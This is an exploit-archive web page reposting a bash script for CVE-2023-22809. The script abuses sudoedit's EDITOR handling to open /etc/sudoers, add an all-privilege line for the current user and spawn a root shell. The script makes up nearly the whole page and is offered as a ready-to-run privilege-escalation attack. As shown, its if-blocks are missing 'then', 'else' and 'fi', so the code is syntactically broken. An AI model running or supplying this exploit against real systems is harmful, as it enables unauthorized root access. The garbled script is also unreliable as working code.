sudo 1.9.12p1 Privilege Escalation

CVE Category Price Severity
CVE-2023-22809 CWE-269 Not specified High
Author Risk Exploitation Type Date
Qualys Security Team High Local 2023-04-03
Our sensors found this exploit at:

Below is a copy:

sudo 1.9.12p1 Privilege Escalation
#!/usr/bin/env bash

# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation
# Exploit Author: n3m1.sys
# CVE: CVE-2023-22809
# Date: 2023/01/21
# Vendor Homepage:
# Software Link:
# Version: 1.8.0 to 1.9.12p1
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
# Git repository:
# Running this exploit on a vulnerable system allows a localiattacker to gain 
# a root shell on the machine.
# The exploit checks if the current user has privileges to run sudoedit or 
# sudo -e on a file as root. If so it will open the sudoers file for the
# attacker to add a line to gain privileges on all the files and get a root 
# shell.

if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
    echo "> Currently installed sudo version is not vulnerable"
    exit 1

EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)

if [ -z "$EXPLOITABLE" ]; then
    echo "> It doesn't seem that this user can run sudoedit as root"
    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
    echo "> BINGO! User exploitable"
    echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
    echo "$( whoami ) ALL=(ALL:ALL) ALL"
    read -n 1 -s -r -p "Press any key to continue..."
    EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
    sudo su root
    exit 0

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.